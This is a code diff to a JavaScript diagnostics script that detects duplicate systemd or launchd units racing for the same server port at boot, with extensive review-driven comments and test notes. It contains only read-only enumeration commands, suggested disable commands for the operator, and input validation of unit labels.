 export function classifyMultiUnitRisk(raw = {}) {
   if (raw.platform === "darwin") {
     if (raw.plistBlob == null) {
       return { state: "unknown", reason: "could not enumerate LaunchAgents/LaunchDaemons" };
     }
-    const disabledLabels = parseDisabledLabels(raw.disabledBlob);
+    const disabledLabels = unionDisabledLabels(raw.disabledBlob, raw.systemDisabledBlob);
     const units = parsePlistCandidates(raw.plistBlob).filter(u => !disabledLabels.has(u.name));
     return groupAndAssessConflicts(units);
   }
 
   if (raw.userShowOut == null || raw.systemShowOut == null) {
+    // LOW-3 (review round 4 on #230): a non-systemd Linux host (container, WSL without
+    // systemd, OpenRC) previously got "unknown" — an INFO push on every single `ocp update`,
+    // forever, about a check that can never apply there. "not-applicable" is silent (like
+    // "clear") rather than a permanent, unactionable INFO line; "unknown" is reserved for a
+    // host that DOES have systemctl but this specific probe still failed (permission, timeout,
+    // a transient error) — that case is still genuinely worth surfacing.
+    if (raw.systemctlNotFound) {
+      return { state: "not-applicable", reason: "systemctl not found — this check only applies to systemd-managed Linux hosts" };
+    }
     return {
       state: "unknown",
       reason: "systemctl unavailable, errored, or returned too many candidates for one or more scopes — cannot rule out a boot race",
@@ -408,16 +444,35 @@ export function gatherUnitCandidates(run, platform) {
       disabledBlob = run(`launchctl print-disabled gui/$(id -u) 2>/dev/null`);
     } catch { disabledBlob = null; }
 
-    return { platform, plistBlob, disabledBlob };
+    // Review round 4 on #230: `launchctl print-disabled system` is ALSO an unprivileged,
+    // read-only read (verified directly: uid 501, no sudo, exit 0, 19 entries) — the module
+    // comment above parseDisabledLabels previously claimed this domain "requires root to
+    // query", which was false and had a self-inflicted consequence: this file's OWN WARN
+    // message recommends `sudo launchctl disable system/<label>` for a LaunchDaemon conflict,
+    // so an operator who followed that advice got warned about the same (now-disabled) unit
+    // forever, on every subsequent `ocp doctor`/`ocp update`. Second spawn, same best-effort/
+    // permissive degradation as the gui-domain read above.
+    let systemDisabledBlob;
+    try {
+      systemDisabledBlob = run(`launchctl print-disabled system 2>/dev/null`);
+    } catch { systemDisabledBlob = null; }
+
+    return { platform, plistBlob, disabledBlob, systemDisabledBlob };
   }
 
   let userListing, systemListing;
+  let userNotFound = false, systemNotFound = false;
   try {
     userListing = run(`systemctl --user list-unit-files --type=service --state=enabled --no-legend --no-pager`);
-  } catch { userListing = null; }
+  } catch (err) { userListing = null; userNotFound = isCommandNotFound(err); }
   try {
     systemListing = run(`systemctl list-unit-files --type=service --state=enabled --no-legend --no-pager`);
-  } catch { systemListing = null; }
+  } catch (err) { systemListing = null; systemNotFound = isCommandNotFound(err); }
+  // Only declare "systemctl isn't on this host at all" when BOTH scopes failed that specific
+  // way — the same binary backs both calls, so a genuine absence fails both identically; a
+  // single scope failing with exit 127 while the other succeeds would mean something odder is
+  // going on and deserves the honest "unknown", not a confident "doesn't apply here".
+  const systemctlNotFound = userNotFound && systemNotFound;
 
   const userNames = userListing != null ? extractEnabledServiceNames(userListing) : [];
   const systemNames = systemListing != null ? extractEnabledServiceNames(systemListing) : [];
@@ -444,7 +499,7 @@ export function gatherUnitCandidates(run, platform) {
     }
   }
 
-  return { platform, userListing, systemListing, userShowOut, systemShowOut };
+  return { platform, userListing, systemListing, userShowOut, systemShowOut, systemctlNotFound };
 }
 
 export function detectMultiUnitBootRace(opts = {}) {
@@ -630,18 +685,22 @@ export async function runDoctor(opts = {}) {
   // Gated by skipNetwork like the health/oauth block above — this reads the live
   // systemd/launchd environment (not "network" in the curl/git sense, but the same
   // "don't touch anything live" contract skipNetwork already exists to express in
-  // tests). "clear" pushes nothing (mirrors service_version_matches_tree's own "no
-  // check id at all when there's nothing warn-worthy" convention). "unknown" DOES
-  // push a low-severity INFO line (review finding MED-3.5 on #230): before this,
-  // "verified clear" and "couldn't verify" were indistinguishable from outside the
-  // process (both pushed nothing), which matters because `systemctl --user ...`
-  // fails without XDG_RUNTIME_DIR/DBUS_SESSION_BUS_ADDRESS — exactly what `sudo`'s
-  // env_reset strips — so `sudo ocp update` on a host whose OCP is a SYSTEM unit
-  // (the #215 shape) silently degraded this whole check with no visible trace.
-  // INFO does not affect fail_count/warn_count. See the module comment above
-  // classifyMultiUnitRisk for the full design rationale (why WARN not FAIL, why
-  // grouping is by port alone, why this doesn't depend on scripts/lib/restart-
-  // unit.mjs).
+  // tests). "clear" and "not-applicable" (LOW-3 on #230: systemctl genuinely doesn't
+  // exist on this host — a container, WSL without systemd, OpenRC — so the check
+  // can never apply here) both push nothing; the latter exists specifically so such
+  // a host doesn't get an unactionable INFO line on every single `ocp update`,
+  // forever. "unknown" DOES push a low-severity INFO line (review finding MED-3.5 on
+  // #230) — reserved for a host that DOES have systemctl but this specific probe
+  // still failed (permission, timeout, a transient error): before this distinction
+  // existed, "verified clear" and "couldn't verify" were indistinguishable from
+  // outside the process (both pushed nothing), which matters because
+  // `systemctl --user ...` fails without XDG_RUNTIME_DIR/DBUS_SESSION_BUS_ADDRESS —
+  // exactly what `sudo`'s env_reset strips — so `sudo ocp update` on a host whose
+  // OCP is a SYSTEM unit (the #215 shape) silently degraded this whole check with no
+  // visible trace. INFO does not affect fail_count/warn_count. See the module
+  // comment above classifyMultiUnitRisk for the full design rationale (why WARN not
+  // FAIL, why grouping is by port alone, why this doesn't depend on
+  // scripts/lib/restart-unit.mjs).
   if (!opts.skipNetwork) {
     const multiUnit = detectMultiUnitBootRace(opts);
     if (multiUnit.state === "warn") {

--- a/scripts/doctor.mjs
+++ b/scripts/doctor.mjs
@@ -44,48 +44,83 @@ function semverCompare(a, b) {
 // `ocp doctor` surfaced this; it was found by hand while diagnosing an unrelated
 // update failure. See issue #215 for the live evidence table.
 //
-// Relationship to scripts/lib/restart-unit.mjs (PR #221, issue #215's OTHER
-// half): that module resolves which unit CURRENTLY owns the port from LIVE
+// Relationship to scripts/lib/restart-unit.mjs: introduced on PR #221's branch
+// (issue #215's OTHER half; NOT YET on main as of this writing — #221 is still
+// in review) to resolve which unit CURRENTLY owns the port from LIVE
 // process/cgroup state (ss/lsof + /proc/<pid>/cgroup) for the upgrade restart
 // phase — a live-PID question. This check answers a different, STATIC question
 // — which units WOULD start at boot, and are any two of them configured to
-// collide — by reading unit-file config (`systemctl show` ExecStart/Environment,
-// or plist content on macOS), never a live PID. No logic is shared or
-// duplicated between the two; this module intentionally does not import
-// restart-unit.mjs. See the PR body for the explicit dependency decision.
+// collide on the same port — by reading unit-file config (`systemctl show`
+// ExecStart/Environment, or plist content on macOS), never a live PID. No logic
+// is shared or duplicated between the two; this module intentionally does not
+// import restart-unit.mjs and does not depend on #221 landing first.
 //
 // WARN, never FAIL: scripts/upgrade.mjs's runUpgrade() pre-flight guard only
 // tolerates ready_to_upgrade=false for next_action.kind="fresh_install" — a
 // FAIL here would block every future `ocp update` on an affected host,
-// including the update that might fix the drift. The two units' config could
-// also legitimately differ for reasons this check cannot know (e.g. a
-// deliberate blue/green setup on a non-standard port) — WARN surfaces the
-// hazard without itself becoming a new outage vector.
+// including the update that might fix the drift. The units' config could also
+// legitimately differ for reasons this check cannot know (e.g. a deliberate
+// blue/green setup) — WARN surfaces the hazard without itself becoming a new
+// outage vector.
 //
 // Enumeration strategy: matching on unit NAME is fragile (a host may name a
 // unit anything — the field incident's units were "ocp.service" and
 // "ocp-proxy.service", nothing guarantees that pattern elsewhere), so instead
 // every ENABLED unit's config is read and fingerprinted by whether its
 // ExecStart (Linux) / ProgramArguments (macOS) actually invokes server.mjs, and
-// from where. Two units only count as conflicting when they share BOTH the
-// resolved port AND the resolved working tree — matching the field incident's
-// own shape ("both pointed at the same working tree and the same port") and
-// deliberately excluding same-port-different-tree or same-tree-different-port,
-// neither of which is this failure mode.
+// from where.
 //
-// Cost: capped at 4 real subprocess spawns total regardless of host size (two
-// `list-unit-files` calls to enumerate enabled *.service names, then at most
-// one BATCHED `systemctl show` call per scope covering every candidate at
-// once — never one spawn per unit). A missing/erroring systemctl, or an
-// unreadable listing, degrades the WHOLE check to "unknown" (no push) rather
-// than a false all-clear or a crash — see classifyMultiUnitRisk's null-vs-""
-// discipline below, which mirrors restart-unit.mjs's own "ss returned nothing
-// we could parse" vs "ss never ran" distinction (ss/lsof there, systemctl here,
-// same reasoning: an absent/foreign-uid PID column silently degrades, and the
-// caller must not read that as "confirmed clean").
+// Grouping key: PORT ALONE (review finding MED-3.7 on #230 — see PR body for
+// the full discussion). #220's own text is "detect when more than one enabled
+// unit ... targets the OCP port" and #215's is "points at the same port"; an
+// earlier revision of this check additionally required the working tree to
+// match, reasoning from the single observed incident's shape rather than the
+// stated requirement, and did so without flagging the narrowing as a
+// narrowing. That was wrong on the merits too: two units on the same port from
+// DIFFERENT trees still race for the port and would serve DIFFERENT code to
+// whoever wins — arguably a worse outcome than the field incident, not a
+// lesser one, and a host in that state has two entirely separate installs
+// nobody may even realize both auto-start. Working tree is therefore reported
+// in the WARN message (same tree vs different trees) to help diagnose the
+// hazard, but no longer gates whether it fires.
+//
+// Cost: Linux — up to 4 real subprocess spawns total regardless of host size
+// (two `list-unit-files` calls to enumerate enabled *.service names, then at
+// most one BATCHED `systemctl show` call per scope covering every candidate at
+// once — never one spawn per unit; the extra `-p UnitFileState -p
+// EnvironmentFiles` properties added by this revision ride the SAME batched
+// call, zero extra spawns). macOS — 2 spawns (one enumerates every candidate
+// plist in one shell command; one reads `launchctl print-disabled` to exclude
+// units an operator has persistently disabled). A missing/erroring systemctl,
+// or an unreadable listing, degrades the WHOLE check to "unknown" — which now
+// pushes a low-severity INFO line (review finding MED-3.5) rather than nothing
+// at all, so "verified clear" and "couldn't verify" are distinguishable from
+// outside the process, not just internally. See classifyMultiUnitRisk's
+// null-vs-"" discipline below, which mirrors restart-unit.mjs's own "ss
+// returned nothing we could parse" vs "ss never ran" distinction.
 // ═══════════════════════════════════════════════════════════════════════════
 
 const UNIT_NAME_RE = /^[A-Za-z0-9:_.@-]+\.service$/;
+// launchd labels are reverse-DNS-style identifiers (e.g. "dev.ocp.proxy",
+// "homebrew.mxcl.postgresql@17" — "@" is a real, observed character in the
+// wild). Same trust-boundary class as UNIT_NAME_RE above and PR #221's MED-5
+// finding on restart-unit.mjs: a <Label> is attacker-creatable by anyone who
+// can drop a plist, and review finding MED-3.3 on #230 found an earlier
+// revision of this file interpolated an unvalidated Label straight into a
+// copy-pasteable shell command in the WARN message — README.md's own guidance
+// is to hand `ocp doctor` output to an AI agent, which can make a
+// command-injection-shaped string in that output actionable, not just
+// cosmetically broken.
+const LAUNCHD_LABEL_RE = /^[A-Za-z0-9_.@-]+$/;
+// Only these UnitFileState values mean "would actually start at boot" for the
+// purposes of this check. Defense in depth (review finding HIGH-2 on #230): a
+// mutation that deleted `--state=enabled` from the LISTING command survived
+// the full suite untouched, because nothing re-derived "enabled" from each
+// unit's OWN config — this allowlist is that second, independent gate. Stays
+// PERMISSIVE when the property is absent (older systemd, or a caller that
+// didn't request it) — this is a second check, not the only one, and must not
+// newly reject unit shapes the primary --state=enabled filter already handled.
+const UNIT_FILE_STATE_ALLOWLIST = new Set(["enabled", "enabled-runtime"]);
 // ARG_MAX / cost safety cap: past this many enabled *.service units in one scope,
 // a single batched `systemctl show <all names> ...` command line risks becoming
 // unwieldy for no real benefit (a host with 200+ enabled units enabling two OCP
@@ -119,13 +154,18 @@ function parseSystemctlShowBlocks(showOutput) {
 }
 
 // Fingerprint one `systemctl show` property block as an OCP server.mjs unit, or
-// null if it plainly isn't one. ExecStart's structured form from `systemctl show`
-// looks like "{ path=... ; argv[]=/usr/bin/node /home/opc/ocp/server.mjs ; ... }" —
-// pull argv[] out of that if present, else fall back to treating the whole
-// property as the argv string (keeps this tolerant of older systemd's plainer
-// ExecStart rendering rather than hard-requiring the structured form).
+// null if it plainly isn't one (or isn't confidently determinable). ExecStart's
+// structured form from `systemctl show` looks like
+// "{ path=... ; argv[]=/usr/bin/node /home/opc/ocp/server.mjs ; ... }" — pull
+// argv[] out of that if present, else fall back to treating the whole property
+// as the argv string (tolerant of older systemd's plainer ExecStart rendering).
 function fingerprintSystemdUnit(props, scope) {
   if (!UNIT_NAME_RE.test(props.Id || "")) return null; // never trust an unvalidated Id downstream
+
+  // HIGH-2 defense in depth — see UNIT_FILE_STATE_ALLOWLIST above.
+  const state = props.UnitFileState;
+  if (state && !UNIT_FILE_STATE_ALLOWLIST.has(state)) return null;
+
   const execStart = props.ExecStart || "";
   const argvMatch = execStart.match(/argv\[\]=([^;]+)/);
   const argv = (argvMatch ? argvMatch[1] : execStart).trim().split(/\s+/).filter(Boolean);
@@ -133,13 +173,22 @@ function fingerprintSystemdUnit(props, scope) {
   if (!serverArg) return null; // not an OCP unit — doesn't invoke server.mjs at all
   const workingTree = serverArg === "server.mjs" ? "" : serverArg.slice(0, -"/server.mjs".length);
 
+  // MED-6 (review of #230): `systemctl show -p Environment` reflects only literal
+  // `Environment=` directives — it does NOT expand `EnvironmentFile=`. setup.mjs itself only
+  // ever writes literal Environment= lines, but a hand-edited unit could use either. If a
+  // candidate's real port might be set via a file we cannot read here, assuming DEFAULT_PORT
+  // would fabricate a port match (or a mismatch) with no real evidence behind it — drop the
+  // candidate rather than guess (same "unknown must never be treated as safe-to-guess"
+  // philosophy this file already applies elsewhere).
+  if (props.EnvironmentFiles && props.EnvironmentFiles.trim()) return null;
+
   const env = props.Environment || "";
   const portMatch = env.match(/CLAUDE_PROXY_PORT=(\S+)/);
   const port = portMatch ? portMatch[1].replace(/^"|"$/g, "") : String(DEFAULT_PORT);
   const bindMatch = env.match(/CLAUDE_BIND=(\S+)/);
   const bind = bindMatch ? bindMatch[1].replace(/^"|"$/g, "") : "(default bind)";
 
-  return { name: props.Id, scope, port, workingTree, bind };
+  return { name: props.Id, scope, platform: "linux", port, workingTree, bind };
 }
 
 // macOS equivalent. setup.mjs only EVER writes one LaunchAgent
@@ -148,8 +197,14 @@ function fingerprintSystemdUnit(props, scope) {
 // definitions) is far less likely to arise from OCP's own tooling here than on
 // Linux, where a hand-rolled system-scope unit is exactly what the field
 // incident found. It is not impossible — an operator can hand-create a second
-// LaunchAgent or a system LaunchDaemon pointing at the same server.mjs — so
-// this still checks rather than silently skipping the platform.
+// LaunchAgent, or a package installer can drop one system-wide under
+// /Library/LaunchAgents, or a LaunchDaemon under /Library/LaunchDaemons — so
+// this still checks rather than silently skipping the platform, and scans all
+// three locations (review finding MED-3.4 on #230: an earlier revision only
+// scanned the two locations LEAST likely to be populated on an ordinary Mac —
+// Apple's own daemons live under /System/Library, so /Library/LaunchDaemons is
+// normally empty — and never scanned /Library/LaunchAgents at all, which is
+// exactly where a system-wide installer drops one).
 //
 // plistBlob is a single pre-concatenated blob (one shell command, see
 // gatherUnitCandidates) with each file's content prefixed by a
@@ -170,12 +225,30 @@ function parsePlistCandidates(plistBlob) {
     if (!serverArg) continue; // not an OCP unit
     const workingTree = serverArg === "server.mjs" ? "" : serverArg.slice(0, -"/server.mjs".length);
     const labelMatch = content.match(/<key>Label<\/key>\s*<string>([^<]*)<\/string>/);
+    const label = labelMatch ? labelMatch[1] : null;
+    // Defense in depth (see LAUNCHD_LABEL_RE above): reject the whole candidate, exactly like
+    // an unvalidated systemd Id is rejected on the Linux side, rather than trust an unvalidated
+    // Label into any downstream message or command.
+    if (!label || !LAUNCHD_LABEL_RE.test(label)) continue;
     const portMatch = content.match(/<key>CLAUDE_PROXY_PORT<\/key>\s*<string>([^<]*)<\/string>/);
     const bindMatch = content.match(/<key>CLAUDE_BIND<\/key>\s*<string>([^<]*)<\/string>/);
-    const scope = path.includes("/LaunchDaemons/") ? "system" : "user";
+    const isDaemon = path.includes("/LaunchDaemons/");
+    // scope: display grouping only ("is this personal-to-me or system-wide"). domain: the
+    // launchctl disable-command TARGET, which is a different axis — review finding MED-3.3 on
+    // #230 found the WARN message printed a `systemctl` command on macOS (a binary that does
+    // not exist there) at all, so the fix must get the macOS command right, not just avoid
+    // Linux syntax. A LaunchDaemon runs in launchd's `system` domain (`sudo launchctl disable
+    // system/<label>`); a LaunchAgent — whether personal (~/Library) or installed system-wide
+    // (/Library) — loads into the CURRENT USER's `gui/<uid>` domain, and launchctl's
+    // disabled-overrides database (see parseDisabledLabels below) is tracked per that domain
+    // regardless of which directory installed the plist.
+    const scope = isDaemon || path.startsWith("/Library/LaunchAgents/") ? "system" : "user";
+    const domain = isDaemon ? "system" : "gui";
     units.push({
-      name: labelMatch ? labelMatch[1] : path,
+      name: label,
       scope,
+      domain,
+      platform: "darwin",
       port: portMatch ? portMatch[1] : String(DEFAULT_PORT),
       workingTree,
       bind: bindMatch ? bindMatch[1] : "(default bind)",
@@ -184,17 +257,41 @@ function parsePlistCandidates(plistBlob) {
   return units;
 }
 
-// Two-or-more units sharing BOTH port and working tree are the actual hazard
-// shape (see the module comment above); anything else — a lone OCP unit, or
-// two units that merely happen to share a port with a DIFFERENT tree, or the
-// same tree on a DIFFERENT port — is not this failure mode and must not warn.
+// Parses `launchctl print-disabled gui/<uid>` into the set of labels an
+// operator has PERSISTENTLY disabled — real format (verified against a live
+// host): a `disabled services = { "<label>" => enabled|disabled ... }` block.
+// A RunAtLoad=true plist that's been `launchctl disable`d is inert (it will
+// NOT actually start), so warning about it would be a false positive — and
+// `launchctl disable` is the persistent, standard remediation a Mac operator
+// would reach for (the exact analogue of `systemctl --user disable` on
+// Linux). Best-effort: if disabledBlob couldn't be gathered, this returns an
+// empty set (nothing filtered) — permissive, not a reason to mark the whole
+// check "unknown", since RunAtLoad=true is already a sufficient positive
+// signal on its own and this is only a refinement that trims false positives
+// further. Scoped to the `gui/<uid>` domain only (covers every LaunchAgent
+// candidate, personal or system-wide-installed); a LaunchDaemon's disabled
+// state lives in the `system` domain, which requires root to query and is out
+// of scope for a read-only, unprivileged pre-flight probe — a documented,
+// deliberate limitation, not a silent gap (see the PR body).
+function parseDisabledLabels(disabledBlob) {
+  const disabled = new Set();
+  if (!disabledBlob) return disabled;
+  const re = /"([^"]+)"\s*=>\s*(enabled|disabled)/g;
+  let m;
+  while ((m = re.exec(String(disabledBlob))) !== null) {
+    if (m[2] === "disabled") disabled.add(m[1]);
+  }
+  return disabled;
+}
+
+// Two-or-more units sharing the same PORT are the hazard (see the "Grouping
+// key" discussion in the module comment above — port alone, not port+tree).
 function groupAndAssessConflicts(units) {
   if (units.length < 2) return { state: "clear" };
   const groups = new Map();
   for (const u of units) {
-    const key = `${u.port}::${u.workingTree}`;
-    if (!groups.has(key)) groups.set(key, []);
-    groups.get(key).push(u);
+    if (!groups.has(u.port)) groups.set(u.port, []);
+    groups.get(u.port).push(u);
   }
   const conflicting = [...groups.values()].filter(g => g.length >= 2);
   if (conflicting.length === 0) return { state: "clear" };
@@ -206,18 +303,22 @@ function groupAndAssessConflicts(units) {
 // gather-vs-classify split so the decision logic is directly unit-testable
 // without a live systemd/launchd instance.
 //
-// raw.userShowOut / raw.systemShowOut (Linux) and raw.plistBlob (macOS) follow
-// a strict three-value discipline, same as restart-unit.mjs's ss/lsof/cgroup
-// probes: `null` means "could not gather this" (tool missing, command failed,
-// or too many candidates to probe cheaply — MAX_UNIT_CANDIDATES), `""` or a
-// real listing means "gathered successfully, here's what's there" (including
+// raw.userShowOut / raw.systemShowOut / raw.plistBlob follow a strict
+// three-value discipline, same as restart-unit.mjs's ss/lsof/cgroup probes:
+// `null` means "could not gather this" (tool missing, command failed, or too
+// many candidates to probe cheaply — MAX_UNIT_CANDIDATES), `""` or a real
+// listing means "gathered successfully, here's what's there" (including
 // legitimately empty). `null` must never be read as "confirmed nothing found".
+// raw.disabledBlob (macOS only) is best-effort and does NOT participate in
+// this discipline — see parseDisabledLabels above.
 export function classifyMultiUnitRisk(raw = {}) {
   if (raw.platform === "darwin") {
     if (raw.plistBlob == null) {
       return { state: "unknown", reason: "could not enumerate LaunchAgents/LaunchDaemons" };
     }
-    return groupAndAssessConflicts(parsePlistCandidates(raw.plistBlob));
+    const disabledLabels = parseDisabledLabels(raw.disabledBlob);
+    const units = parsePlistCandidates(raw.plistBlob).filter(u => !disabledLabels.has(u.name));
+    return groupAndAssessConflicts(units);
   }
 
   if (raw.userShowOut == null || raw.systemShowOut == null) {
@@ -238,19 +339,42 @@ export function classifyMultiUnitRisk(raw = {}) {
 // null/""/text discipline classifyMultiUnitRisk expects. `run` defaults to
 // real execSync in production; tests inject a fake runner that pattern-matches
 // on the command string — the exact shape PR #221's resolveRestartPlan uses,
-// adopted here specifically because that PR's review (MED-6) found the
-// UNTESTED impure layer was where the real defects hid, not the pure
-// classifier.
+// adopted here specifically because that PR's review found the UNTESTED
+// impure layer was where the real defects hid, not the pure classifier (this
+// PR's own review — HIGH-1 on #230 — found the same thing had happened here:
+// two tests asserted on the command string FROM INSIDE the injected fake,
+// where the assertion's throw was swallowed by this function's own try/catch
+// before it could reach the test framework. Fixed by having tests capture the
+// command string and assert on it AFTER calling this function — see
+// test-features.mjs).
+//
+// MED-4 (review of #230), verified on a real host: `for f in <dir>/*.plist; do
+// [ -f "$f" ] && ...; done` exits non-zero when the LAST glob in the list
+// expands to nothing (the shell leaves it as a literal, unmatched pattern, and
+// `[ -f ]` on a literal glob string is false) — and on an ordinary Mac,
+// /Library/LaunchDaemons is normally EMPTY (Apple's own daemons live under
+// /System/Library), so this was the common case, not an edge case. execSync
+// throws on that non-zero exit and DISCARDS the stdout already produced by
+// earlier, successful iterations — silently turning a working scan into
+// "unknown" on nearly every real Mac. Fixed with a trailing `; :` (`:` is the
+// shell no-op builtin, always exit 0) so the loop's own exit status never
+// determines the command's.
 export function gatherUnitCandidates(run, platform) {
   if (platform === "darwin") {
     let plistBlob;
     try {
       plistBlob = run(
-        `for f in "$HOME/Library/LaunchAgents"/*.plist /Library/LaunchDaemons/*.plist; do ` +
-        `[ -f "$f" ] && { echo "===OCP-DOCTOR-FILE:$f==="; cat "$f"; }; done 2>/dev/null`
+        `for f in "$HOME/Library/LaunchAgents"/*.plist /Library/LaunchAgents/*.plist /Library/LaunchDaemons/*.plist; do ` +
+        `[ -f "$f" ] && { echo "===OCP-DOCTOR-FILE:$f==="; cat "$f"; }; done 2>/dev/null; :`
       );
     } catch { plistBlob = null; }
-    return { platform, plistBlob };
+
+    let disabledBlob;
+    try {
+      disabledBlob = run(`launchctl print-disabled gui/$(id -u) 2>/dev/null`);
+    } catch { disabledBlob = null; }
+
+    return { platform, plistBlob, disabledBlob };
   }
 
   let userListing, systemListing;
@@ -272,7 +396,7 @@ export function gatherUnitCandidates(run, platform) {
       userShowOut = null;
     } else {
       try {
-        userShowOut = run(`systemctl --user show ${userNames.join(" ")} -p Id -p ExecStart -p Environment --no-pager`);
+        userShowOut = run(`systemctl --user show ${userNames.join(" ")} -p Id -p ExecStart -p Environment -p UnitFileState -p EnvironmentFiles --no-pager`);
       } catch { userShowOut = null; }
     }
   }
@@ -281,7 +405,7 @@ export function gatherUnitCandidates(run, platform) {
       systemShowOut = null;
     } else {
       try {
-        systemShowOut = run(`systemctl show ${systemNames.join(" ")} -p Id -p ExecStart -p Environment --no-pager`);
+        systemShowOut = run(`systemctl show ${systemNames.join(" ")} -p Id -p ExecStart -p Environment -p UnitFileState -p EnvironmentFiles --no-pager`);
       } catch { systemShowOut = null; }
     }
   }
@@ -296,19 +420,46 @@ export function detectMultiUnitBootRace(opts = {}) {
   return classifyMultiUnitRisk(raw);
 }
 
+// Picks which unit in a conflicting group to suggest disabling: prefer a
+// "user"-scope one (matches the actual remediation used on the field-incident
+// host — the stray USER unit was disabled, the SYSTEM unit kept), else the
+// first unit encountered (deterministic: gather always processes scopes/
+// directories in the same fixed order).
+function pickDisableTarget(group) {
+  return group.find(u => u.scope === "user") || group[0];
+}
+
+// Platform- and domain-aware remediation command (review finding MED-3.3 on
+// #230: the previous revision always printed a `systemctl` command, including
+// on macOS, where that binary does not exist).
+function buildDisableHint(group) {
+  const target = pickDisableTarget(group);
+  if (target.platform === "darwin") {
+    const cmd = target.domain === "system"
+      ? `sudo launchctl disable system/${target.name}`
+      : `launchctl disable gui/$(id -u)/${target.name}`;
+    return `disable the stray one — e.g. "${cmd}" (reversible: the plist is preserved, only a persistent disable flag is set; undo with the same command substituting "enable" for "disable")`;
+  }
+  if (target.scope === "user") {
+    return `disable the stray one — e.g. "systemctl --user disable ${target.name}" (reversible: the unit file is preserved, only the boot-enable link is removed)`;
+  }
+  return `disable whichever is not your intended target — e.g. "systemctl disable ${target.name}" (reversible: the unit file is preserved)`;
+}
+
 // Actionable WARN text: names every conflicting unit, the difference that
-// matters (bind address — the field incident's actual LAN-reachability hazard),
-// and the operator fix used to resolve the real host (disable the stray unit;
-// the file is preserved, the fix is reversible).
+// matters (bind address — the field incident's actual LAN-reachability
+// hazard — plus whether the units share one working tree or point at
+// different ones, see the "Grouping key" discussion above), and a
+// platform-correct, reversible remediation command.
 function describeMultiUnitConflict(groups) {
   return groups.map(group => {
     const port = group[0].port;
+    const trees = [...new Set(group.map(u => u.workingTree))];
+    const treeNote = trees.length === 1
+      ? ` (same working tree: ${trees[0] || "(unresolved)"})`
+      : ` — DIFFERENT working trees (${trees.map(t => t || "(unresolved)").join(" vs ")}): different code may be racing for this port, not just different config`;
     const names = group.map(u => `${u.scope}-scope "${u.name}" (bind ${u.bind})`).join(" and ");
-    const userUnit = group.find(u => u.scope === "user");
-    const disableHint = userUnit
-      ? `disable the stray one — e.g. "systemctl --user disable ${userUnit.name}" (reversible: the unit file is preserved, only the boot-enable link is removed)`
-      : `disable whichever is not your intended target — e.g. "systemctl disable <unit>" (reversible: the unit file is preserved)`;
-    return `${group.length} enabled units target OCP port ${port}: ${names} — boot race: whichever starts first wins the port and the other silently orphans (issue #215). Pick one and ${disableHint}.`;
+    return `${group.length} enabled units target OCP port ${port}${treeNote}: ${names} — boot race: whichever starts first wins the port and the other silently orphans (issue #215). Pick one and ${buildDisableHint(group)}.`;
   }).join(" | ");
 }
 
@@ -418,16 +569,24 @@ export async function runDoctor(opts = {}) {
   // Gated by skipNetwork like the health/oauth block above — this reads the live
   // systemd/launchd environment (not "network" in the curl/git sense, but the same
   // "don't touch anything live" contract skipNetwork already exists to express in
-  // tests). Only pushed when there's a confirmed conflict to report — "clear" and
-  // "unknown" both push nothing, mirroring service_version_matches_tree's own
-  // "no check id at all when there's nothing warn-worthy" convention elsewhere in
-  // this file. See the module comment above classifyMultiUnitRisk for the full
-  // design rationale (why WARN not FAIL, why port+workingTree must both match,
-  // why this doesn't depend on scripts/lib/restart-unit.mjs).
+  // tests). "clear" pushes nothing (mirrors service_version_matches_tree's own "no
+  // check id at all when there's nothing warn-worthy" convention). "unknown" DOES
+  // push a low-severity INFO line (review finding MED-3.5 on #230): before this,
+  // "verified clear" and "couldn't verify" were indistinguishable from outside the
+  // process (both pushed nothing), which matters because `systemctl --user ...`
+  // fails without XDG_RUNTIME_DIR/DBUS_SESSION_BUS_ADDRESS — exactly what `sudo`'s
+  // env_reset strips — so `sudo ocp update` on a host whose OCP is a SYSTEM unit
+  // (the #215 shape) silently degraded this whole check with no visible trace.
+  // INFO does not affect fail_count/warn_count. See the module comment above
+  // classifyMultiUnitRisk for the full design rationale (why WARN not FAIL, why
+  // grouping is by port alone, why this doesn't depend on scripts/lib/restart-
+  // unit.mjs).
   if (!opts.skipNetwork) {
     const multiUnit = detectMultiUnitBootRace(opts);
     if (multiUnit.state === "warn") {
       push("multi_unit_boot_race", "WARN", describeMultiUnitConflict(multiUnit.groups));
+    } else if (multiUnit.state === "unknown") {
+      push("multi_unit_boot_race", "INFO", `could not verify: ${multiUnit.reason}`);
     }
   }
 

--- a/test-features.mjs
+++ b/test-features.mjs
@@ -6578,20 +6578,42 @@ test("ocp-connect: the hardcoded three-id JSON-parse-failure fallback never over
 //
 // This is a STATIC config cross-reference (which units WOULD start at boot,
 // and do any two collide) — deliberately independent of scripts/lib/
-// restart-unit.mjs (PR #221), which resolves a DIFFERENT, live-PID question
-// for the restart phase. See the PR body for the explicit dependency decision.
+// restart-unit.mjs (PR #221, not yet on main), which resolves a DIFFERENT,
+// live-PID question for the restart phase. See the PR body for the explicit
+// dependency decision.
 //
 // Every test here is BEHAVIORAL: it calls the exported classifier/gatherer (or
 // runDoctor with an injected opts.run) and asserts on return values / pushed
-// checks — never on scripts/doctor.mjs's source text.
+// checks / captured command strings — never on scripts/doctor.mjs's source
+// text. Every finding from the independent review of the first version of this
+// section is called out by its ID (HIGH-1, HIGH-2, MED-3 through MED-7) so a
+// reader can trace which real defect each test guards.
+//
+// HIGH-1 note up front, since it shapes every test below that inspects a
+// generated command string: assertions must live OUTSIDE the injected `run`
+// fake, on a CAPTURED command string, never inside the fake itself. Two tests
+// in the first version of this section asserted `assert.ok(...)` from INSIDE
+// the fake; gatherUnitCandidates wraps every `run(...)` call in its own
+// try/catch, which silently swallowed the AssertionError before it could reach
+// the test framework — the counters those tests then checked had already been
+// incremented before the throw, so the tests could never actually fail. See
+// the PR body's mutation table for the deliberately-false assertion that
+// proved this.
 // ═══════════════════════════════════════════════════════════════════════════
 import { classifyMultiUnitRisk, gatherUnitCandidates } from "./scripts/doctor.mjs";
+import { writeFileSync } from "node:fs";
+// mkdtempSync, rmSync (node:fs) and tmpdir (node:os) are already imported bare earlier in this
+// file (see the snapshot-test section, ~:1653) — ESM forbids re-declaring the same binding via
+// a second import statement, even from the same specifier, so only writeFileSync is new here.
 
-console.log("\nMulti-unit boot-race pre-flight (issue #220) — classifyMultiUnitRisk:");
+console.log("\nMulti-unit boot-race pre-flight (issue #220) — classifyMultiUnitRisk (Linux):");
 
-// Realistic `systemctl show <units> -p Id -p ExecStart -p Environment` output, matching the
-// exact field-incident shape from issue #215: system unit ocp.service (bind 0.0.0.0), user
-// unit ocp-proxy.service (bind 127.0.0.1), same working tree, same port.
